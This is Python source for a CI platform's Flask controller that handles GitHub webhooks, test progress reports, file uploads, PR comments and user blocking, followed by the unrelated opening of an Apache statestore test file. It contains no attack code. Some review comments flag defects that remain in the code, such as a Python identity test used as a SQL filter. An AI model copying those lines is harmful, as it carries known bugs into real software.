def get_html_issue_body(title, author, body, issue_number, url) -> Any:
    """
    Curate a HTML formatted body for the issue mail.

    :param title: title of the issue
    :type title: str
    :param author: author of the issue
    :type author: str
    :param body: content of the issue
    :type body: str
    :param issue_number: issue number
    :type issue_number: int
    :param url: link to the issue
    :type url: str
    :return: email body in html format
    :rtype: str
    """
    from run import app
    # Render the markdown issue body to HTML, then feed it to the mail template.
    rendered_body = markdown(body, extras=["target-blank-links", "task_list", "code-friendly"])
    email_template = app.jinja_env.get_or_select_template("email/new_issue.txt")
    return email_template.render(title=title, author=author, body=rendered_body, url=url)
@mod_ci.route('/start-ci', methods=['GET', 'POST'])
@request_from_github()
def start_ci():
    """
    Perform various actions when the GitHub webhook is triggered.

    Reaction to the next events need to be processed
    (after verification):
        - Ping (for fun)
        - Push
        - Pull Request
        - Issues
        - Release
    """
    if request.method != 'POST':
        return 'OK'
    else:
        abort_code = 418
        event = request.headers.get('X-GitHub-Event')
        if event == "ping":
            g.log.debug('server ping successful')
            return json.dumps({'msg': 'Hi!'})
        # Verify the HMAC signature before acting on any payload.
        x_hub_signature = request.headers.get('X-Hub-Signature')
        if not is_valid_signature(x_hub_signature, request.data, g.github['ci_key']):
            g.log.warning(f'CI signature failed: {x_hub_signature}')
            abort(abort_code)
        payload = request.get_json()
        if payload is None:
            g.log.warning(f'CI payload is empty')
            abort(abort_code)
        gh = GitHub(access_token=g.github['bot_token'])
        repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
        if event == "push":
            g.log.debug('push event detected')
            if 'after' in payload:
                commit_hash = payload['after']
                github_status = repository.statuses(commit_hash)
                # Update the db to the new last commit
                ref = repository.git().refs('heads/master').get()
                last_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first()
                for platform in TestPlatform.values():
                    # Seed fetch_commit_<platform> on first run so later code
                    # always has a baseline commit to compare against.
                    commit_name = 'fetch_commit_' + platform
                    fetch_commit = GeneralData.query.filter(GeneralData.key == commit_name).first()
                    if fetch_commit is None:
                        prev_commit = GeneralData(commit_name, last_commit.value)
                        g.db.add(prev_commit)
                last_commit.value = ref['object']['sha']
                g.db.commit()
                queue_test(g.db, github_status, commit_hash, TestType.commit)
            else:
                g.log.warning('Unknown push type! Dumping payload for analysis')
                g.log.warning(payload)
        elif event == "pull_request":
            g.log.debug('Pull Request event detected')
            # If it's a valid PR, run the tests
            pr_nr = payload['pull_request']['number']
            if payload['action'] in ['opened', 'synchronize', 'reopened']:
                try:
                    commit_hash = payload['pull_request']['head']['sha']
                    github_status = repository.statuses(commit_hash)
                except KeyError:
                    g.log.error("Didn't find a SHA value for a newly opened PR!")
                    g.log.error(payload)
                    return 'ERROR'
                # Check if user blacklisted
                user_id = payload['pull_request']['user']['id']
                if BlockedUsers.query.filter(BlockedUsers.user_id == user_id).first() is not None:
                    g.log.warning("User Blacklisted")
                    github_status.post(
                        state=Status.ERROR,
                        description="CI start aborted. You may be blocked from accessing this functionality",
                        target_url=url_for('home.index', _external=True)
                    )
                    return 'ERROR'
                queue_test(g.db, github_status, commit_hash, TestType.pull_request, pr_nr=pr_nr)
            elif payload['action'] == 'closed':
                g.log.debug('PR was closed, no after hash available')
                # Cancel running queue
                tests = Test.query.filter(Test.pr_nr == pr_nr).all()
                for test in tests:
                    # Add cancelled status only if the test hasn't started yet
                    if len(test.progress) > 0:
                        continue
                    progress = TestProgress(test.id, TestStatus.canceled, "PR closed", datetime.datetime.now())
                    g.db.add(progress)
                    # NOTE(review): no g.db.commit() in this branch — the added
                    # TestProgress rows rely on a later commit elsewhere; confirm.
                    repository.statuses(test.commit).post(
                        state=Status.FAILURE,
                        description="Tests canceled",
                        context=f"CI - {test.platform.value}",
                        target_url=url_for('test.by_id', test_id=test.id, _external=True)
                    )
        elif event == "issues":
            g.log.debug('issues event detected')
            issue_data = payload['issue']
            issue_action = payload['action']
            issue = Issue.query.filter(Issue.issue_id == issue_data['number']).first()
            issue_title = issue_data['title']
            issue_id = issue_data['number']
            issue_author = issue_data['user']['login']
            issue_body = issue_data['body']
            if issue_action == "opened":
                # Newly opened issues are forwarded to the developer mailing list.
                inform_mailing_list(g.mailer, issue_id, issue_title, issue_author, issue_body)
            if issue is not None:
                # Keep the locally tracked issue row in sync with GitHub.
                issue.title = issue_title
                issue.status = issue_data['state']
                g.db.commit()
        elif event == "release":
            g.log.debug("Release webhook triggered")
            release_data = payload['release']
            action = payload['action']
            release_version = release_data['tag_name']
            # Tags are typically of the form "vX.Y"; strip the leading "v".
            if release_version[0] == 'v':
                release_version = release_version[1:]
            if action == "prereleased":
                g.log.debug("Ignoring event meant for pre-release")
            elif action in ["deleted", "unpublished"]:
                g.log.debug("Received delete/unpublished action")
                CCExtractorVersion.query.filter_by(version=release_version).delete()
                g.db.commit()
                g.log.info(f"Successfully deleted release {release_version} on {action} action")
            elif action in ["edited", "published"]:
                g.log.debug(f"Latest release version is {release_version}")
                release_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first().value
                release_date = release_data['published_at']
                if action == "edited":
                    release = CCExtractorVersion.query.filter(CCExtractorVersion.version == release_version).one()
                    release.released = datetime.datetime.strptime(release_date, '%Y-%m-%dT%H:%M:%SZ').date()
                    release.commit = release_commit
                else:
                    release = CCExtractorVersion(release_version, release_date, release_commit)
                    g.db.add(release)
                g.db.commit()
                g.log.info(f"Successfully updated release version with webhook action '{action}'")
                # adding test corresponding to last commit to the baseline regression results
                # this is not altered when a release is deleted or unpublished since it's based on commit
                test = Test.query.filter(and_(Test.commit == release_commit,
                                              Test.platform == TestPlatform.linux)).first()
                test_result_file = g.db.query(TestResultFile).filter(TestResultFile.test_id == test.id).subquery()
                test_result = g.db.query(TestResult).filter(TestResult.test_id == test.id).subquery()
                # NOTE(review): ``test_result_file.c.got is not None`` is a Python
                # identity test on the column object (always True), not a SQL
                # filter — ``.isnot(None)`` is probably intended; confirm.
                g.db.query(RegressionTestOutput.correct).filter(
                    and_(RegressionTestOutput.regression_id == test_result_file.c.regression_test_id,
                         test_result_file.c.got is not None)).values(test_result_file.c.got)
                g.db.query(RegressionTest.expected_rc).filter(
                    RegressionTest.id == test_result.c.regression_test_id
                ).values(test_result.c.expected_rc)
                g.db.commit()
                g.log.info("Successfully added tests for latest release!")
            else:
                g.log.warning(f"Unsupported release action: {action}")
        else:
            g.log.warning(f'CI unrecognized event: {event}')
        return json.dumps({'msg': 'EOL'})
def update_build_badge(status, test) -> None:
    """
    Build status badge for current test to be displayed on sample-platform.

    Only commit tests on the main repository update the badge.

    :param status: current testing status
    :type status: str
    :param test: current commit that is tested
    :type test: Test
    :return: Nothing
    :rtype: None
    """
    if test.test_type == TestType.commit and is_main_repo(test.fork.github):
        parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        # Bug fix: platform enum members expose ``.value`` (singular), as used
        # elsewhere in this module; ``.values`` raised AttributeError and the
        # badge was never copied.
        original_location = os.path.join(parent_dir, 'static', 'svg', f'{status.upper()}-{test.platform.value}.svg')
        build_status_location = os.path.join(parent_dir, 'static', 'img', 'status', f'build-{test.platform.value}.svg')
        shutil.copyfile(original_location, build_status_location)
        g.log.info('Build badge updated successfully!')
@mod_ci.route('/progress-reporter/<test_id>/<token>', methods=['POST'])
def progress_reporter(test_id, token):
    """
    Handle the progress of a certain test after validating the token. If necessary, update the status on GitHub.

    :param test_id: The id of the test to update.
    :type test_id: int
    :param token: The token to check the validity of the request.
    :type token: str
    :return: Nothing.
    :rtype: None
    """
    from run import config, log
    test = Test.query.filter(Test.id == test_id).first()
    # Guard clauses: unknown test or bad token -> reject immediately.
    if test is None or test.token != token:
        return "FAIL"
    repo_folder = config.get('SAMPLE_REPOSITORY', '')
    if 'type' not in request.form:
        return "OK"
    report_type = request.form['type']
    if report_type == 'progress':
        log.info('[PROGRESS_REPORTER] Progress reported')
        if not progress_type_request(log, test, test_id, request):
            return "FAIL"
    elif report_type == 'equality':
        log.info('[PROGRESS_REPORTER] Equality reported')
        equality_type_request(log, test_id, test, request)
    elif report_type == 'logupload':
        log.info('[PROGRESS_REPORTER] Log upload')
        if not upload_log_type_request(log, test_id, repo_folder, test, request):
            return "EMPTY"
    elif report_type == 'upload':
        log.info('[PROGRESS_REPORTER] File upload')
        if not upload_type_request(log, test_id, repo_folder, test, request):
            return "EMPTY"
    elif report_type == 'finish':
        log.info('[PROGRESS_REPORTER] Test finished')
        finish_type_request(log, test_id, test, request)
    else:
        # Unknown report type.
        return "FAIL"
    return "OK"
def progress_type_request(log, test, test_id, request) -> bool:
    """
    Handle progress updates for progress reporter.

    :param log: logger
    :type log: Logger
    :param test: concerned test
    :type test: Test
    :param test_id: The id of the test to update.
    :type test_id: int
    :param request: Request parameters
    :type request: Request
    :return: True when the progress entry was accepted and processed, False
        when it was rejected because the test already finished.
    :rtype: bool
    """
    status = TestStatus.from_string(request.form['status'])
    current_status = TestStatus.progress_step(status)
    message = request.form['message']

    if len(test.progress) != 0:
        last_status = TestStatus.progress_step(test.progress[-1].status)

        # Ignore updates arriving after the test already finished.
        if last_status in [TestStatus.completed, TestStatus.canceled]:
            return False

        # A step going backwards indicates a duplicate/out-of-order entry.
        if last_status > current_status:
            status = TestStatus.canceled  # type: ignore
            message = "Duplicate Entries"

        if last_status < current_status:
            # get KVM start time for finding KVM preparation time
            kvm_entry = Kvm.query.filter(Kvm.test_id == test_id).first()
            # NOTE(review): kvm_entry may be None here; the attribute writes
            # below would then raise AttributeError — confirm a Kvm row always
            # exists when a progress step advances.
            if status == TestStatus.building:
                log.info('test preparation finished')
                prep_finish_time = datetime.datetime.now()
                # save preparation finish time
                kvm_entry.timestamp_prep_finished = prep_finish_time
                g.db.commit()
                # set time taken in seconds to do preparation
                time_diff = (prep_finish_time - kvm_entry.timestamp).total_seconds()
                set_avg_time(test.platform, "prep", time_diff)
            elif status == TestStatus.testing:
                log.info('test build procedure finished')
                build_finish_time = datetime.datetime.now()
                # save build finish time
                kvm_entry.timestamp_build_finished = build_finish_time
                g.db.commit()
                # set time taken in seconds to do preparation
                time_diff = (build_finish_time - kvm_entry.timestamp_prep_finished).total_seconds()
                set_avg_time(test.platform, "build", time_diff)

    # Record the new progress entry.
    progress = TestProgress(test.id, status, message)
    g.db.add(progress)
    g.db.commit()

    gh = GitHub(access_token=g.github['bot_token'])
    repository = gh.repos(g.github['repository_owner'])(g.github['repository'])

    # Store the test commit for testing in case of commit
    if status == TestStatus.completed and is_main_repo(test.fork.github):
        commit_name = 'fetch_commit_' + test.platform.value
        commit = GeneralData.query.filter(GeneralData.key == commit_name).first()
        fetch_commit = Test.query.filter(
            and_(Test.commit == commit.value, Test.platform == test.platform)
        ).first()

        if test.test_type == TestType.commit and test.id > fetch_commit.id:
            commit.value = test.commit
            g.db.commit()

    # If status is complete, remove the Kvm entry
    if status in [TestStatus.completed, TestStatus.canceled]:
        log.debug("Test {id} has been {status}".format(id=test_id, status=status))
        var_average = 'average_time_' + test.platform.value
        current_average = GeneralData.query.filter(GeneralData.key == var_average).first()
        average_time = 0
        total_time = 0

        if current_average is None:
            # No average recorded yet: derive one from the first/last
            # TestProgress timestamps of every finished test on this platform.
            platform_tests = g.db.query(Test.id).filter(Test.platform == test.platform).subquery()
            finished_tests = g.db.query(TestProgress.test_id).filter(
                and_(
                    TestProgress.status.in_([TestStatus.canceled, TestStatus.completed]),
                    TestProgress.test_id.in_(platform_tests)
                )
            ).subquery()
            in_progress_statuses = [TestStatus.preparation, TestStatus.completed, TestStatus.canceled]
            finished_tests_progress = g.db.query(TestProgress).filter(
                and_(
                    TestProgress.test_id.in_(finished_tests),
                    TestProgress.status.in_(in_progress_statuses)
                )
            ).subquery()
            # group_concat yields a comma-separated timestamp list per test.
            times = g.db.query(
                finished_tests_progress.c.test_id,
                label('time', func.group_concat(finished_tests_progress.c.timestamp))
            ).group_by(finished_tests_progress.c.test_id).all()

            for p in times:
                parts = p.time.split(',')
                start = datetime.datetime.strptime(parts[0], '%Y-%m-%d %H:%M:%S')
                end = datetime.datetime.strptime(parts[-1], '%Y-%m-%d %H:%M:%S')
                total_time += int((end - start).total_seconds())

            if len(times) != 0:
                average_time = total_time // len(times)

            new_avg = GeneralData(var_average, average_time)
            log.info(f'new average time {str(average_time)} set successfully')
            g.db.add(new_avg)
            g.db.commit()
        else:
            # Fold this run's duration into the existing running average.
            all_results = TestResult.query.count()
            regression_test_count = RegressionTest.query.count()
            number_test = all_results / regression_test_count
            updated_average = float(current_average.value) * (number_test - 1)
            pr = test.progress_data()
            end_time = pr['end']
            start_time = pr['start']

            # Strip timezone info so only naive datetimes are subtracted.
            if end_time.tzinfo is not None:
                end_time = end_time.replace(tzinfo=None)
            if start_time.tzinfo is not None:
                start_time = start_time.replace(tzinfo=None)

            last_running_test = end_time - start_time
            updated_average = updated_average + last_running_test.total_seconds()
            current_average.value = updated_average // number_test
            g.db.commit()
            log.info(f'average time updated to {str(current_average.value)}')

        kvm = Kvm.query.filter(Kvm.test_id == test_id).first()

        if kvm is not None:
            log.debug("Removing KVM entry")
            g.db.delete(kvm)
            g.db.commit()

    # Post status update
    state = Status.PENDING
    target_url = url_for('test.by_id', test_id=test.id, _external=True)
    context = "CI - {name}".format(name=test.platform.value)

    if status == TestStatus.canceled:
        state = Status.ERROR
        message = 'Tests aborted due to an error; please check'
    elif status == TestStatus.completed:
        # Determine if success or failure
        # It fails if any of these happen:
        # - A crash (unexpected exit code)
        # - A not None value on the "got" of a TestResultFile (
        #   meaning the hashes do not match)
        crashes = g.db.query(count(TestResult.exit_code)).filter(
            and_(
                TestResult.test_id == test.id,
                TestResult.exit_code != TestResult.expected_rc
            )).scalar()
        results_zero_rc = g.db.query(RegressionTest.id).filter(
            RegressionTest.expected_rc == 0
        ).subquery()
        results = g.db.query(count(TestResultFile.got)).filter(
            and_(
                TestResultFile.test_id == test.id,
                TestResultFile.regression_test_id.in_(results_zero_rc),
                TestResultFile.got.isnot(None)
            )
        ).scalar()
        log.debug('Test {id} completed: {crashes} crashes, {results} results'.format(
            id=test.id, crashes=crashes, results=results
        ))
        if crashes > 0 or results > 0:
            state = Status.FAILURE
            message = 'Not all tests completed successfully, please check'
        else:
            state = Status.SUCCESS
            message = 'Tests completed'
        if test.test_type == TestType.pull_request:
            comment_pr(test.id, state, test.pr_nr, test.platform.name)
        update_build_badge(state, test)
    else:
        message = progress.message

    gh_commit = repository.statuses(test.commit)
    try:
        gh_commit.post(state=state, description=message, context=context, target_url=target_url)
    except ApiError as a:
        log.error('Got an exception while posting to GitHub! Message: {message}'.format(message=a.message))

    if status in [TestStatus.completed, TestStatus.canceled]:
        # Start next test if necessary, on the same platform
        start_platforms(g.db, repository, 60, test.platform)

    return True
def equality_type_request(log, test_id, test, request):
    """
    Handle equality request type for progress reporter.

    :param log: logger
    :type log: Logger
    :param test_id: The id of the test to update.
    :type test_id: int
    :param test: concerned test
    :type test: Test
    :param request: Request parameters
    :type request: Request
    """
    regression_id = request.form['test_id']
    output_id = request.form['test_file_id']
    log.debug('Equality for {t}/{rt}/{rto}'.format(t=test_id, rt=regression_id, rto=output_id))

    rto = RegressionTestOutput.query.filter(RegressionTestOutput.id == output_id).first()
    if rto is None:
        # Equality posted on a file that's ignored presumably
        log.info('No rto for {test_id}: {test}'.format(test_id=test_id, test=regression_id))
        return

    g.db.add(TestResultFile(test.id, regression_id, rto.id, rto.correct))
    g.db.commit()
def upload_log_type_request(log, test_id, repo_folder, test, request) -> bool:
    """
    Handle logupload request type for progress reporter.

    Stores the uploaded log under ``LogFiles/<test id>.txt``.

    :param log: logger
    :type log: Logger
    :param test_id: The id of the test to update.
    :type test_id: int
    :param repo_folder: repository folder
    :type repo_folder: str
    :param test: concerned test
    :type test: Test
    :param request: Request parameters
    :type request: Request
    :return: True when the log file was stored, False otherwise.
    :rtype: bool
    """
    log.debug("Received log file for test {id}".format(id=test_id))
    # File upload, process
    if 'file' in request.files:
        uploaded_file = request.files['file']
        filename = secure_filename(uploaded_file.filename)
        # Fix: the original used `filename is ''`, an identity comparison that
        # is not guaranteed for equal strings (and raises a SyntaxWarning on
        # modern Python); test for emptiness instead.
        if not filename:
            return False
        temp_path = os.path.join(repo_folder, 'TempFiles', filename)
        # Save to temporary location
        uploaded_file.save(temp_path)
        final_path = os.path.join(repo_folder, 'LogFiles', '{id}{ext}'.format(id=test.id, ext='.txt'))

        os.rename(temp_path, final_path)
        log.debug("Stored log file")
        return True
    return False
def upload_type_request(log, test_id, repo_folder, test, request) -> bool:
    """
    Handle upload request type for progress reporter.

    Saves the uploaded result file under its SHA-256 hash in ``TestResults``
    and records a TestResultFile entry referencing that hash.

    :param log: logger
    :type log: Logger
    :param test_id: The id of the test to update.
    :type test_id: int
    :param repo_folder: repository folder
    :type repo_folder: str
    :param test: concerned test
    :type test: Test
    :param request: Request parameters
    :type request: Request
    :return: True when the file was stored and recorded, False otherwise.
    :rtype: bool
    """
    log.debug('Upload for {t}/{rt}/{rto}'.format(
        t=test_id, rt=request.form['test_id'], rto=request.form['test_file_id'])
    )
    # File upload, process
    if 'file' in request.files:
        uploaded_file = request.files['file']
        filename = secure_filename(uploaded_file.filename)
        # Fix: the original used `filename is ''`, an identity comparison that
        # is not guaranteed for equal strings (and raises a SyntaxWarning on
        # modern Python); test for emptiness instead.
        if not filename:
            log.warning('empty filename provided for uploading')
            return False
        temp_path = os.path.join(repo_folder, 'TempFiles', filename)
        # Save to temporary location
        uploaded_file.save(temp_path)
        # Get hash and check if it's already been submitted
        hash_sha256 = hashlib.sha256()
        with open(temp_path, "rb") as f:
            for chunk in iter(lambda: f.read(4096), b""):
                hash_sha256.update(chunk)
        file_hash = hash_sha256.hexdigest()
        filename, file_extension = os.path.splitext(filename)
        final_path = os.path.join(
            repo_folder, 'TestResults', '{hash}{ext}'.format(hash=file_hash, ext=file_extension)
        )
        os.rename(temp_path, final_path)
        rto = RegressionTestOutput.query.filter(
            RegressionTestOutput.id == request.form['test_file_id']).first()
        result_file = TestResultFile(test.id, request.form['test_id'], rto.id, rto.correct, file_hash)
        g.db.add(result_file)
        g.db.commit()
        return True
    return False
def finish_type_request(log, test_id, test, request):
    """
    Handle finish request type for progress reporter.

    :param log: logger
    :type log: Logger
    :param test_id: The id of the test to update.
    :type test_id: int
    :param test: concerned test
    :type test: Test
    :param request: Request parameters
    :type request: Request
    """
    form = request.form
    log.debug('Finish for {t}/{rt}'.format(t=test_id, rt=form['test_id']))

    regression_test = RegressionTest.query.filter(RegressionTest.id == form['test_id']).first()
    # Record the run's outcome against the expected return code.
    g.db.add(TestResult(
        test.id, regression_test.id, form['runTime'],
        form['exitCode'], regression_test.expected_rc
    ))
    try:
        g.db.commit()
    except IntegrityError as e:
        log.error('Could not save the results: {msg}'.format(msg=e))
def set_avg_time(platform: TestPlatform, process_type: str, time_taken: int) -> None:
    """
    Set average platform preparation time.

    Stores both the running average and the number of samples it is based on
    as GeneralData key/value pairs.

    :param platform: platform to which the average time belongs
    :type platform: TestPlatform
    :param process_type: process to save the average time for
    :type process_type: str
    :param time_taken: time taken to complete the process
    :type time_taken: int
    """
    val_key = "avg_" + str(process_type) + "_time_" + platform.value
    count_key = "avg_" + str(process_type) + "_count_" + platform.value

    current_avg_count = GeneralData.query.filter(GeneralData.key == count_key).first()

    # adding average data the first time
    if current_avg_count is None:
        avg_count_GD = GeneralData(count_key, str(1))
        avg_time_GD = GeneralData(val_key, str(time_taken))
        g.db.add(avg_count_GD)
        g.db.add(avg_time_GD)
    else:
        # Incrementally fold the new sample into the stored running average.
        current_average = GeneralData.query.filter(GeneralData.key == val_key).first()
        avg_count = int(current_avg_count.value)
        avg_value = int(float(current_average.value))
        new_average = ((avg_value * avg_count) + time_taken) / (avg_count + 1)
        current_avg_count.value = str(avg_count + 1)
        current_average.value = str(new_average)

    g.db.commit()
def comment_pr(test_id, state, pr_nr, platform) -> None:
    """
    Upload the test report to the github PR as comment.

    :param test_id: The identity of Test whose report will be uploaded
    :type test_id: str
    :param state: The state of the PR.
    :type state: Status
    :param pr_nr: PR number to which test commit is related and comment will be uploaded
    :type pr_nr: str
    :param platform: name of the platform the test ran on
    :type platform: str
    """
    from run import app, log
    # Regression tests counted as "passed": exit code matched the expectation
    # and either it was non-zero, or (for zero-rc tests) no output mismatch
    # was recorded, or the expected output is flagged as ignored.
    regression_testid_passed = g.db.query(TestResult.regression_test_id).outerjoin(
        TestResultFile, TestResult.test_id == TestResultFile.test_id).filter(
        TestResult.test_id == test_id,
        TestResult.expected_rc == TestResult.exit_code,
        or_(
            TestResult.exit_code != 0,
            and_(TestResult.exit_code == 0,
                 TestResult.regression_test_id == TestResultFile.regression_test_id,
                 TestResultFile.got.is_(None)
                 ),
            and_(
                RegressionTestOutput.regression_id == TestResult.regression_test_id,
                RegressionTestOutput.ignore.is_(True),
            ))).subquery()
    # Per-category count of passed regression tests.
    passed = g.db.query(label('category_id', Category.id), label(
        'success', count(regressionTestLinkTable.c.regression_id))).filter(
        regressionTestLinkTable.c.regression_id.in_(regression_testid_passed),
        Category.id == regressionTestLinkTable.c.category_id).group_by(
        regressionTestLinkTable.c.category_id).subquery()
    # Per-category totals joined with the pass counts computed above.
    tot = g.db.query(label('category', Category.name), label('total', count(regressionTestLinkTable.c.regression_id)),
                     label('success', passed.c.success)).outerjoin(
        passed, passed.c.category_id == Category.id).filter(
        Category.id == regressionTestLinkTable.c.category_id).group_by(
        regressionTestLinkTable.c.category_id).all()
    regression_testid_failed = RegressionTest.query.filter(RegressionTest.id.notin_(regression_testid_passed)).all()
    template = app.jinja_env.get_or_select_template('ci/pr_comment.txt')
    message = template.render(tests=tot, failed_tests=regression_testid_failed, test_id=test_id,
                              state=state, platform=platform)
    log.debug('GitHub PR Comment Message Created for Test_id: {test_id}'.format(test_id=test_id))
    try:
        gh = GitHub(access_token=g.github['bot_token'])
        repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
        # Pull requests are just issues with code, so github consider pr comments in issues
        pull_request = repository.issues(pr_nr)
        comments = pull_request.comments().get()
        bot_name = g.github['bot_name']
        comment_id = None
        # Re-use the bot's existing comment for this platform, if any.
        for comment in comments:
            if comment['user']['login'] == bot_name and platform in comment['body']:
                comment_id = comment['id']
                break
        log.debug('GitHub PR Comment ID Fetched for Test_id: {test_id}'.format(test_id=test_id))
        if comment_id is None:
            comment = pull_request.comments().post(body=message)
            comment_id = comment['id']
        else:
            repository.issues().comments(comment_id).post(body=message)
        log.debug('GitHub PR Comment ID {comment} Uploaded for Test_id: {test_id}'.format(
            comment=comment_id, test_id=test_id))
    except Exception as e:
        log.error('GitHub PR Comment Failed for Test_id: {test_id} with Exception {e}'.format(test_id=test_id, e=e))
@mod_ci.route('/show_maintenance')
@login_required
@check_access_rights([Role.admin])
@template_renderer('ci/maintenance.html')
def show_maintenance():
    """
    Get list of Virtual Machines under maintenance.

    :return: platforms in maintenance
    :rtype: dict
    """
    platforms_in_maintenance = MaintenanceMode.query.all()
    return {'platforms': platforms_in_maintenance}
@mod_ci.route('/blocked_users', methods=['GET', 'POST'])
@login_required
@check_access_rights([Role.admin])
@template_renderer()
def blocked_users():
    """
    Render the blocked_users template.

    This returns a list of all currently blacklisted users.
    Also defines processing of forms to add/remove users from blacklist.
    When a user is added to blacklist, removes queued tests on any PR by the user.
    """
    blocked_users = BlockedUsers.query.order_by(BlockedUsers.user_id)

    # Initialize usernames dictionary
    usernames = {u.user_id: 'Error, cannot get username' for u in blocked_users}
    for key in usernames.keys():
        # Fetch usernames from GitHub API
        try:
            api_url = requests.get('https://api.github.com/user/{}'.format(key), timeout=10)
            userdata = api_url.json()
            # Set values to the actual usernames if no errors
            usernames[key] = userdata['login']
        except requests.exceptions.RequestException:
            # NOTE(review): `break` stops resolving ALL remaining usernames
            # after the first network failure; `continue` would only skip the
            # failing one — confirm this is intentional.
            break

    # Define addUserForm processing
    add_user_form = AddUsersToBlacklist()
    if add_user_form.add.data and add_user_form.validate_on_submit():
        if BlockedUsers.query.filter_by(user_id=add_user_form.user_id.data).first() is not None:
            flash('User already blocked.')
            return redirect(url_for('.blocked_users'))

        blocked_user = BlockedUsers(add_user_form.user_id.data, add_user_form.comment.data)
        g.db.add(blocked_user)
        g.db.commit()
        flash('User blocked successfully.')

        try:
            # Remove any queued pull request from blocked user
            gh = GitHub(access_token=g.github['bot_token'])
            repository = gh.repos(g.github['repository_owner'])(g.github['repository'])
            # Getting all pull requests by blocked user on the repo
            pulls = repository.pulls.get()
            for pull in pulls:
                if pull['user']['id'] != add_user_form.user_id.data:
                    continue
                tests = Test.query.filter(Test.pr_nr == pull['number']).all()
                for test in tests:
                    # Add canceled status only if the test hasn't started yet
                    if len(test.progress) > 0:
                        continue
                    progress = TestProgress(test.id, TestStatus.canceled, "PR closed", datetime.datetime.now())
                    g.db.add(progress)
                    g.db.commit()
                    try:
                        # Mark the commit as failed on GitHub so the PR shows it.
                        repository.statuses(test.commit).post(
                            state=Status.FAILURE,
                            description="Tests canceled since user blacklisted",
                            context="CI - {name}".format(name=test.platform.value),
                            target_url=url_for('test.by_id', test_id=test.id, _external=True)
                        )
                    except ApiError as a:
                        g.log.error('Got an exception while posting to GitHub! Message: {message}'.format(
                            message=a.message))
        except ApiError as a:
            g.log.error('Pull Requests of Blocked User could not be fetched: {res}'.format(res=a.response))

        return redirect(url_for('.blocked_users'))

    # Define removeUserForm processing
    remove_user_form = RemoveUsersFromBlacklist()
    if remove_user_form.remove.data and remove_user_form.validate_on_submit():
        blocked_user = BlockedUsers.query.filter_by(user_id=remove_user_form.user_id.data).first()
        if blocked_user is None:
            flash('No such user in Blacklist')
            return redirect(url_for('.blocked_users'))

        g.db.delete(blocked_user)
        g.db.commit()
        flash('User removed successfully.')
        return redirect(url_for('.blocked_users'))

    return {
        'addUserForm': add_user_form,
        'removeUserForm': remove_user_form,
        'blocked_users': blocked_users,
        'usernames': usernames
    }
@mod_ci.route('/toggle_maintenance/<platform>/<status>')
@login_required
@check_access_rights([Role.admin])
def toggle_maintenance(platform, status):
    """
    Toggle maintenance mode for a platform.

    :param platform: name of the platform
    :type platform: str
    :param status: current maintenance status
    :type status: str
    :return: success response if successful, failure response otherwise
    :rtype: JSON
    """
    disabled = status == 'True'
    result = 'failed'
    message = 'Platform Not found'

    try:
        parsed_platform = TestPlatform.from_string(platform)
    except ValueError:
        parsed_platform = None

    if parsed_platform is not None:
        db_mode = MaintenanceMode.query.filter(MaintenanceMode.platform == parsed_platform).first()
        if db_mode is not None:
            db_mode.disabled = disabled
            g.db.commit()
            result = 'success'
            platform = parsed_platform
            message = f'{platform.description} in maintenance? {"Yes" if disabled else "No"}'

    return jsonify({'status': result, 'message': message})
@mod_ci.route('/maintenance-mode/<platform>')
def in_maintenance_mode(platform):
    """
    Check if platform in maintenance mode.

    :param platform: name of the platform
    :type platform: str
    :return: status of the platform
    :rtype: str
    """
    try:
        parsed_platform = TestPlatform.from_string(platform)
    except ValueError:
        return 'ERROR'

    status = MaintenanceMode.query.filter(MaintenanceMode.platform == parsed_platform).first()
    if status is None:
        # First query for this platform: create a default (not disabled) row.
        status = MaintenanceMode(parsed_platform, False)
        g.db.add(status)
        g.db.commit()

    return str(status.disabled)
def is_main_repo(repo_url) -> bool:
    """
    Check whether a repo_url links to the main repository or not.

    :param repo_url: url of fork/main repository of the user
    :type repo_url: str
    :return: checks whether url of main repo is same or not
    :rtype: bool
    """
    from run import config, get_github_config

    github_config = get_github_config(config)
    main_repo = f'{github_config["repository_owner"]}/{github_config["repository"]}'
    return main_repo in repo_url
def add_customized_regression_tests(test_id) -> None:
    """
    Run custom regression tests.

    :param test_id: id of the test
    :type test_id: int
    """
    # Link every currently active regression test to the given test run.
    for regression_test in RegressionTest.query.filter(RegressionTest.active == 1).all():
        g.log.debug(f'Adding RT #{regression_test.id} to test {test_id}')
        g.db.add(CustomizedTest(test_id, regression_test.id))
    g.db.commit()
|
test_statestore.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import defaultdict
import json
import logging
import socket
import threading
import traceback
import time
import urllib2
import uuid
from Types.ttypes import TNetworkAddress
from thrift.protocol import TBinaryProtocol
from thrift.server.TServer import TServer
from thrift.transport import TSocket
from thrift.transport import TTransport
import StatestoreService.StatestoreSubscriber as Subscriber
import StatestoreService.StatestoreService as Statestore
from StatestoreService.StatestoreSubscriber import TUpdateStateResponse
from StatestoreService.StatestoreSubscriber import TTopicRegistration
from ErrorCodes.ttypes import TErrorCode
from Status.ttypes import TStatus
from tests.common.environ import specific_build_type_timeout
LOG = logging.getLogger('test_statestore')
# Tests for the statestore. The StatestoreSubscriber class is a skeleton implementation of
# a Python-based statestore subscriber with additional hooks to allow testing. Each
# StatestoreSubscriber runs its own server so that the statestore may contact it.
#
# All tests in this file may be run in parallel. They assume that a statestore instance is
# already running, and is configured with out-of-the-box defaults (as is the case in our
# usual test environment) which govern failure-detector timeouts etc.
#
# These tests do not yet provide sufficient coverage.
# If no topic entries, do the first and second subscribers always get a callback?
# Adding topic entries to non-existant topic
# Test for from_version and to_version behavior
# Test with many concurrent subscribers
# Test that only the subscribed-to topics are sent
# Test that topic deletions take effect correctly.
def get_statestore_subscribers(host='localhost', port=25010):
  """Fetch the statestore's subscriber list from its debug web page as parsed JSON."""
